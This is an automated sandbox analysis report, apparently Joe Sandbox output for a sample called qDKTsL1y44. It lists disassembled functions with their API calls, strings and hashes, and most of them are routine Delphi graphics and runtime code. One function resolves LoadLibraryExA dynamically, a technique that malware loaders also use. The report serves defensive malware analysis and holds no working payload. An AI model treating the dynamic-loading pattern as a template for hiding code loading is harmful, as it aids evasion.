Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: a8fc0962ca88f5a8ab37e199a85819b0ac0f9962e852ac39a72e4b9bafc905bf
Instruction ID: 8678cd0c21b5fc960735b66a2ff4e1f66a68b998d1f452707ba64e78bf21c004
Opcode Fuzzy Hash: a8fc0962ca88f5a8ab37e199a85819b0ac0f9962e852ac39a72e4b9bafc905bf
Instruction Fuzzy Hash: 8D3126B8754750BFEB00EBA9B98AA2E7BB8EBC4754B804555F504AB200D778BC04CF14

Uniqueness

Uniqueness Score: -1.00%

Function 041EE600 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 041EE609

Part of subcall function 041EE5D4: GetProcAddress.KERNEL32(00000000), ref: 041EE5ED

Strings

VarR8FromStr, xrefs: 041EE761
VarR4FromStr, xrefs: 041EE74B
VarDiv, xrefs: 041EE69B
VarMul, xrefs: 041EE685
VarAdd, xrefs: 041EE659
VarBoolFromStr, xrefs: 041EE7A3
VarIdiv, xrefs: 041EE6B1
VarOr, xrefs: 041EE6F3
VarAnd, xrefs: 041EE6DD
VarBstrFromCy, xrefs: 041EE7B9
VarDateFromStr, xrefs: 041EE777
VarBstrFromBool, xrefs: 041EE7E5
VarNeg, xrefs: 041EE62D
VarXor, xrefs: 041EE709
VarNot, xrefs: 041EE643
VarMod, xrefs: 041EE6C7
VarBstrFromDate, xrefs: 041EE7CF
VarCmp, xrefs: 041EE71F
VarSub, xrefs: 041EE66F
VarCyFromStr, xrefs: 041EE78D
VariantChangeTypeEx, xrefs: 041EE617
oleaut32.dll, xrefs: 041EE604
VarI4FromStr, xrefs: 041EE735

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 767142928cb4c7c87b08184cee3b33c3171086de4311c8f9a8e9747040d5a10a
Instruction ID: 3a1102cb8c26bf10835e4c038e1d676311011c6de3b243473360eb18b35ecae1
Opcode Fuzzy Hash: 767142928cb4c7c87b08184cee3b33c3171086de4311c8f9a8e9747040d5a10a
Instruction Fuzzy Hash: 20411A7C748B055A72046B6F7AC483B77D8DA44628764402AB508BAA44EF26FD82C72B

Uniqueness

Uniqueness Score: -1.00%

Function 042036B0 Relevance: 37.7, APIs: 25, Instructions: 245windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 042036F3
SelectObject.GDI32(?,?), ref: 04203708
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,04203778,?,?), ref: 0420374C
SelectObject.GDI32(?,?), ref: 04203766
DeleteObject.GDI32(?), ref: 04203772
CreateCompatibleDC.GDI32(00000000), ref: 04203786
CreateCompatibleBitmap.GDI32(?,?,?), ref: 042037A7
SelectObject.GDI32(?,?), ref: 042037BC
SelectPalette.GDI32(?,0E080DB6,00000000), ref: 042037D0
SelectPalette.GDI32(?,?,00000000), ref: 042037E2
SelectPalette.GDI32(?,00000000,000000FF), ref: 042037F7
SelectPalette.GDI32(?,0E080DB6,000000FF), ref: 0420380D
RealizePalette.GDI32(?), ref: 04203819
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0420383B
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0420385D
SetTextColor.GDI32(?,00000000), ref: 04203865
SetBkColor.GDI32(?,00FFFFFF), ref: 04203873
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0420389F
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 042038C4
SetTextColor.GDI32(?,?), ref: 042038CE
SetBkColor.GDI32(?,?), ref: 042038D8
SelectObject.GDI32(?,00000000), ref: 042038EB
DeleteObject.GDI32(?), ref: 042038F4
SelectPalette.GDI32(?,00000000,00000000), ref: 04203916
DeleteDC.GDI32(?), ref: 0420391F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: 7619ea24317fa7f5268b0f6aec8dff2afabed4d0066257ba032a99cd7c82c45e
Instruction ID: a2e53104a63b2eb4f539147db31f52a35a48c8938b1ac97fac9bd57e18cac6a0
Opcode Fuzzy Hash: 7619ea24317fa7f5268b0f6aec8dff2afabed4d0066257ba032a99cd7c82c45e
Instruction Fuzzy Hash: 6381A0B5A00609AFEB50DFA9CD85EAF7BFCEB0C614F914554FA18E7280C635ED008B61

Uniqueness

Uniqueness Score: -1.00%

Function 04205644 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 04205667
GetDC.USER32(00000000), ref: 04205695
CreateCompatibleDC.GDI32(?), ref: 042056A6
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 042056C1
SelectObject.GDI32(?,00000000), ref: 042056DB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 042056FD
CreateCompatibleDC.GDI32(?), ref: 0420570B
SelectObject.GDI32(?), ref: 04205753
SelectPalette.GDI32(?,?,00000000), ref: 04205766
RealizePalette.GDI32(?), ref: 0420576F
SelectPalette.GDI32(?,?,00000000), ref: 0420577B
RealizePalette.GDI32(?), ref: 04205784
SetBkColor.GDI32(?), ref: 0420578E
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 042057B2
SetBkColor.GDI32(?,00000000), ref: 042057BC
SelectObject.GDI32(?,00000000), ref: 042057CF
DeleteObject.GDI32 ref: 042057DB
DeleteDC.GDI32(?), ref: 042057F1
SelectObject.GDI32(?,00000000), ref: 0420580C
DeleteDC.GDI32(00000000), ref: 04205828
ReleaseDC.USER32(00000000,00000000), ref: 04205839

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: a2950f8a3807c73e452b43fb0d5c8e1bbfa96bbaba52561d3451a08a909fe264
Instruction ID: 64f5ed0d3cf3da3b8ed8bc2609ee55412ac344e4e5f64bf8bc691db99e0157e5
Opcode Fuzzy Hash: a2950f8a3807c73e452b43fb0d5c8e1bbfa96bbaba52561d3451a08a909fe264
Instruction Fuzzy Hash: 3D510E75F10609BBEB11DBE9CC84BAEB7FCAB08704F908855B614E7191D774A980CB54

Uniqueness

Uniqueness Score: -1.00%

Function 042063D4 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04206642
CreateCompatibleDC.GDI32(00000001), ref: 042066A7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 042066BC
SelectObject.GDI32(?,00000000), ref: 042066C6
SelectPalette.GDI32(?,?,00000000), ref: 042066F6
RealizePalette.GDI32(?), ref: 04206702
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 04206726
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0420677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 04206734
SelectPalette.GDI32(?,00000000,000000FF), ref: 04206766
SelectObject.GDI32(?,?), ref: 04206773
DeleteObject.GDI32(00000000), ref: 04206779

Strings

(, xrefs: 0420658D
BM, xrefs: 042064F8

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: 2a2a68c3cd07fd1fa4c719d89a0534c2772b1853f7f64584c62d2e2173119b49
Instruction ID: 8c65ad5c401bc8ec5aa1d6eb03d9503cd13d98b65bdccc2bce976784e6321165
Opcode Fuzzy Hash: 2a2a68c3cd07fd1fa4c719d89a0534c2772b1853f7f64584c62d2e2173119b49
Instruction Fuzzy Hash: 7ED138B4B102199FEF14DFA9C894BAEBBF5FF48304F048465E904AB296D734E950CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04222D88 Relevance: 25.8, APIs: 17, Instructions: 258COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 04222DBC
GetClientRect.USER32(00000000,?), ref: 04222DDF
GetWindowRect.USER32(00000000,?), ref: 04222DF1
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04222E07
OffsetRect.USER32(?,?,?), ref: 04222E1C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0422303B), ref: 04222E35
InflateRect.USER32(?,00000000,00000000), ref: 04222E53
GetWindowLongA.USER32(00000000,000000F0), ref: 04222E6D
DrawEdge.USER32(?,?,?,00000008), ref: 04222F6C
IntersectClipRect.GDI32(?,?,?,?,?), ref: 04222F85
OffsetRect.USER32(?,?,?), ref: 04222FAF
GetRgnBox.GDI32(?,?), ref: 04222FBE
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04222FD4
IntersectRect.USER32(?,?,?), ref: 04222FE5
OffsetRect.USER32(?,?,?), ref: 04222FFA
FillRect.USER32(?,?,00000000), ref: 04223016
ReleaseDC.USER32(00000000,?), ref: 04223035

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
String ID:
API String ID: 2490777911-0
Opcode ID: 50e0b154dcf86c20dcbec3d1fb44cea2e95a35d0232821ecbc2dbf364b43a48c
Instruction ID: 20ff94776406596f483c0947f213faccf04ca7817c21c6cc74338bfd775ee010
Opcode Fuzzy Hash: 50e0b154dcf86c20dcbec3d1fb44cea2e95a35d0232821ecbc2dbf364b43a48c
Instruction Fuzzy Hash: 34A12871E10618AFEB01DBA8C995EEEB7F9AF09304F1440A5F914EB291C775BE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04205B54 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0420614C: GetDC.USER32(00000000), ref: 042061A2
Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 042061B7
Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 042061C1
Part of subcall function 0420614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04204D0F,00000000,04204D9B), ref: 042061E5
Part of subcall function 0420614C: ReleaseDC.USER32(00000000,00000000), ref: 042061F0

SelectPalette.GDI32(?,?,000000FF), ref: 04205B97
RealizePalette.GDI32(?), ref: 04205BA6
GetDeviceCaps.GDI32(?,0000000C), ref: 04205BB8
GetDeviceCaps.GDI32(?,0000000E), ref: 04205BC7
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 04205BFA
SetStretchBltMode.GDI32(?,00000004), ref: 04205C08
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 04205C20
SetStretchBltMode.GDI32(00000000,00000003), ref: 04205C3D
CreateCompatibleDC.GDI32(00000000), ref: 04205C9E
SelectObject.GDI32(?,?), ref: 04205CB3
SelectObject.GDI32(?,00000000), ref: 04205D12
DeleteDC.GDI32(00000000), ref: 04205D21

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: 310472923394222552277036a147809781e5e45111c682e47dfc73e956dddafb
Instruction ID: 2ba0b7644162b1d8e2677008858bc88ba47bcd80bdc4bc27cafb813791d8e3e6
Opcode Fuzzy Hash: 310472923394222552277036a147809781e5e45111c682e47dfc73e956dddafb
Instruction Fuzzy Hash: DE7113B9B10605AFEB50DBA9C984F6ABBF8AB08204F548555B548DB282D734FD40CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04203510 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 04203527
CreateCompatibleDC.GDI32(00000000), ref: 04203531
GetObjectA.GDI32(?,00000018,?), ref: 04203551
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 04203568
GetDC.USER32(00000000), ref: 04203574
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 042035A1
ReleaseDC.USER32(00000000,00000000), ref: 042035C7
SelectObject.GDI32(?,?), ref: 042035E2
SelectObject.GDI32(?,00000000), ref: 042035F1
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0420361D
SelectObject.GDI32(?,00000000), ref: 0420362B
SelectObject.GDI32(?,00000000), ref: 04203639
DeleteDC.GDI32(?), ref: 0420364F
DeleteDC.GDI32(?), ref: 04203658

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: d5a5526131a13defdde89de74c440687350e76276e554184e25e01f17e2559c0
Instruction ID: 144cf646163371a887227b9f6604585d8fcb98764e202568ab4562841067357e
Opcode Fuzzy Hash: d5a5526131a13defdde89de74c440687350e76276e554184e25e01f17e2559c0
Instruction Fuzzy Hash: 5841E9B6F10649AFEB11DBE9CC81FAEB7FCEB08704F904411BA14E7281D775A9008B64

Uniqueness

Uniqueness Score: -1.00%

Function 041E743C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61windowregistryCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 041E7454
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 041E7460
RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 041E746F
RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 041E747B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 041E7493
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 041E74B7

Strings

Magellan MSWHEEL, xrefs: 041E744A
MouseZ, xrefs: 041E744F
MSH_SCROLL_LINES_MSG, xrefs: 041E7476
MSH_WHEELSUPPORT_MSG, xrefs: 041E746A
MSWHEEL_ROLLMSG, xrefs: 041E745B

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Message$Window$Register$Send$Find
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 3569030445-3736581797
Opcode ID: 50993273041994f7eb4e0046a0e3bc96569eacacd6806141c6d8e36748c8d4ee
Instruction ID: 8dd554540133d789b40745f275915e4895d0c1e5d8af293b0a48ede1070fcf59
Opcode Fuzzy Hash: 50993273041994f7eb4e0046a0e3bc96569eacacd6806141c6d8e36748c8d4ee
Instruction Fuzzy Hash: 2E111C79244B06AFF7149FA6DCC1F76BBE8EF44710F148465B9648B281E7B0B940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0420DD94 Relevance: 18.1, APIs: 12, Instructions: 142COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 0420DDAF
GetWindowRect.USER32(00000000,?), ref: 0420DDCA
OffsetRect.USER32(?,?,?), ref: 0420DDDF
GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 0420DDED
GetWindowLongA.USER32(00000000,000000F0), ref: 0420DE1E
GetSystemMetrics.USER32(00000002), ref: 0420DE33
GetSystemMetrics.USER32(00000003), ref: 0420DE3C
InflateRect.USER32(?,000000FE,000000FE), ref: 0420DE4B
GetSysColorBrush.USER32(0000000F), ref: 0420DE78
FillRect.USER32(?,?,00000000), ref: 0420DE86
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0420DEEF,?,00000000,?,?,?,00000000,?), ref: 0420DEAB
ReleaseDC.USER32(00000000,?), ref: 0420DEE9

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
String ID:
API String ID: 19621357-0
Opcode ID: 32f7412d9651d6f655fa0ec17a2aad9aefef7d6e4e0b12d787ce770864d40c89
Instruction ID: 0a931cab60da6272710390b9510f23dc963c2cbbb8f27510379d19997d293403
Opcode Fuzzy Hash: 32f7412d9651d6f655fa0ec17a2aad9aefef7d6e4e0b12d787ce770864d40c89
Instruction Fuzzy Hash: 86414A71A10619ABEB00EAE9CD81EEFB7BDEF49324F104551FA14F7281CB31AA018760

Uniqueness

Uniqueness Score: -1.00%

Function 041E25CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 041E296A

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 041E28E5
, xrefs: 041E28B0
Unexpected Memory Leak, xrefs: 041E295C
An unexpected memory leak has occurred. , xrefs: 041E272C
The unexpected small block leaks are:, xrefs: 041E27A3
Unknown, xrefs: 041E2828
bytes: , xrefs: 041E27F9
7, xrefs: 041E273D
String, xrefs: 041E283D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 08b4f1a3af41a7159748cb8f22a1aac93d389f3fe8567b6999801bdd3ebd2ebe
Instruction ID: 6d2179513da0cc2ed913594f686703e52372c5b5f91539301902e4095c9d7393
Opcode Fuzzy Hash: 08b4f1a3af41a7159748cb8f22a1aac93d389f3fe8567b6999801bdd3ebd2ebe
Instruction Fuzzy Hash: 12A11A38B046688BEF219B2ECCD0BF877E9EB09714F1441E4E549AB342CB75A9C5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0420B24C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 0420B285
GetSystemMetrics.USER32(00000000), ref: 0420B2AA
GetSystemMetrics.USER32(00000001), ref: 0420B2B5
GetClipBox.GDI32(?,?), ref: 0420B2C7
GetDCOrgEx.GDI32(?,?), ref: 0420B2D4
OffsetRect.USER32(?,?,?), ref: 0420B2ED
IntersectRect.USER32(?,?,?), ref: 0420B2FE
IntersectRect.USER32(?,?,?), ref: 0420B314

Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23

Strings

EnumDisplayMonitors, xrefs: 0420B264

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 45860182dcff875baef590a36c9bbc4d6e0fb8f38e5af68c4e862ca70abf601c
Instruction ID: 3baac9e216ac0696dd10a71c7c7d4a8ba6f4ba038c09102c0927d8fcde4ecbca
Opcode Fuzzy Hash: 45860182dcff875baef590a36c9bbc4d6e0fb8f38e5af68c4e862ca70abf601c
Instruction Fuzzy Hash: 5D31FC75E1060AAFDB10DBE598849FFBBFCEB05210F148126E915E2241E734B945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04238CE4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 04238D04
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 04238D1B
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 04238D21
IsBadReadPtr.KERNEL32(?,00000004), ref: 04238DAF
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 04238DBB
IsBadReadPtr.KERNEL32(?,00000014), ref: 04238DCF

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 04238D16
LoadLibraryExA, xrefs: 04238D11

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: b92292cdd9396ef5d24f0f0a2d0a1fb79ad31756b89617cd6ee983ed93a40ef9
Instruction ID: 38fb25db01a3cc314b5966a3fae3d71177ecf389854cdfc1bfed8ffe011f5927
Opcode Fuzzy Hash: b92292cdd9396ef5d24f0f0a2d0a1fb79ad31756b89617cd6ee983ed93a40ef9
Instruction Fuzzy Hash: E8314BB571030ABBEB20EF69CC85F6A77F8AF14729F404150FA14EB281D374B94087A4

Uniqueness

Uniqueness Score: -1.00%

Function 0421FEEC Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0421FF37
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0421FF5B
ReleaseDC.USER32(00000000,00000000), ref: 0421FF66
CreateCompatibleDC.GDI32(00000000), ref: 0421FF6D
SelectObject.GDI32(00000000,?), ref: 0421FF7D
BeginPaint.USER32(00000000,?,00000000,0422003E,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0421FF9F
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0421FFFB
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0422000C
SelectObject.GDI32(00000000,?), ref: 04220026
DeleteDC.GDI32(00000000), ref: 0422002F
DeleteObject.GDI32(?), ref: 04220038

Part of subcall function 0421F8F4: BeginPaint.USER32(00000000,?), ref: 0421F91F
Part of subcall function 0421F8F4: EndPaint.USER32(00000000,?,0421FA5A), ref: 0421FA4D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

